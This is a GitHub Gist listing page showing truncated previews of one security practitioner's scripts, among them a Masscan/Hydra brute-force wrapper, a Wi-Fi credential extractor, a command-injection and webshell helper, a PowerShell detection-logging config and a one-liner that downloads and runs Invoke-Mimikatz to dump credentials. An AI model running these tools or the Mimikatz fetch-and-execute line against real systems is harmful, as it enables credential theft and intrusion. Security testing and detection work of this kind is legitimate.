Skip to content

Instantly share code, notes, and snippets.

gfoss / Enable-PSRemoting.ps1
Last active Nov 6, 2019
quickly enable psremoting on Windows Hosts via PowerShell
View Enable-PSRemoting.ps1
function enablePSRemoting {
Enable-PSRemoting –force
Set-Service WinRM -StartMode Automatic
Get-WmiObject -Class win32_service | Where-Object {$ -like "WinRM"}
Set-Item WSMan:localhost\client\trustedhosts -value *
Get-Item WSMan:\localhost\Client\TrustedHosts
gfoss /
Created Aug 3, 2017
Simple Masscan + Hydra wrapper used to perform automated scans by group (organization, unit, team, etc) and generate a report on the results.
# @heinzarelli
# greg . foss [at] logrhythm . com
# v0.1 - May 2017
function usage {
echo ""
gfoss / Extract-WiFi-Creds.ps1
Last active Mar 29, 2021
Simple script to extract locally-stored Wi-Fi Credentials
View Extract-WiFi-Creds.ps1
# Extract Wi-Fi Credentials #
# greg . foss @ owasp . org #
# v0.1 -- July, 2017 #
# Licensed under the MIT License
gfoss / say.ps1
Created May 25, 2017
PowerShell Say
View say.ps1
function say {
param( [string]$comment = $_ )
[Reflection.Assembly]::LoadWithPartialName('System.Speech') | Out-Null
$object = New-Object System.Speech.Synthesis.SpeechSynthesizer
gfoss / Quick-Mimikatz
Last active Aug 27, 2021
Quick Mimikatz
View Quick-Mimikatz
*NOTE - These pull from public GitHub Repos that are not under my control. Make sure you trust the content (or better yet, make your own fork) prior to using!*
#mimikatz [local]
IEX (New-Object Net.WebClient).DownloadString(""); Invoke-Mimikatz -Command privilege::debug; Invoke-Mimikatz -DumpCreds;
#encoded-mimikatz [local]
gfoss / PowerShell Command Line Logging
Last active Sep 20, 2021
Detect and alert on nefarious PowerShell command line activity
View PowerShell Command Line Logging
# PowerShell Audit Logging for LogRhythm SIEM - 2015
# For detecting dangerous PowerShell Commands/Functions
Log Source Type:
MS Event Log for Win7/Win8/2008/2012 - PowerShell
Add this file to your PowerShell directory to enable verbose command line audit logging
$LogCommandHealthEvent = $true
$LogCommandLifeCycleEvent = $true
View gist:70ae3df90c5a532baaf7
### Keybase proof
I hereby claim:
* I am gfoss on github.
* I am heinzarelli ( on keybase.
* I have a public key whose fingerprint is 3DC9 DCF4 C0A3 7206 C45B 66FB C2DE DD96 D935 5D0E
To claim this, I am signing this object:
gfoss / command injector
Created Sep 10, 2014
script to assist in exploiting command injection vulns / interacting with simple webshells
View command injector
# Command Injector v0.1
# greg.foss[at]
# modified version of dirtshell by 'superkojiman' to exploit command injection vulnerabilities / access web shells via cli
# =>
function usage {
echo "usage: -u URL"
echo "eg : -u \"\""
gfoss /
Last active Jul 20, 2016
Simple script used to set to run automatically via bash script + cronjob, serve up the content and send out e-mail notifications.
# Utilizing LaNMaSteR53's script to auto-scrape web servers and send out notifications.
# Optimized for Kali Linux
# greg.foss[at]
# cronjob to run this script once a week every Sunday at Midnight
# 0 0 * * 0 /usr/share/peepingtom/
# prepare storage location, remove old data, and migrate existing folders
gfoss / nmap-os-detection
Created Aug 28, 2013
OS-detection. Run this nmap command to count OS's and view the os.txt output file to see the results per-system.
View nmap-os-detection
$ sudo nmap -F -O [IP-RANGE] | grep "scan report\|Running: " > os.txt; echo "$(cat os.txt | grep Apple | wc -l) OS X devices"; echo "$(cat os.txt | grep Linux | wc -l) Linux devices"; echo "$(cat os.txt | grep Windows | wc -l) Windows devices"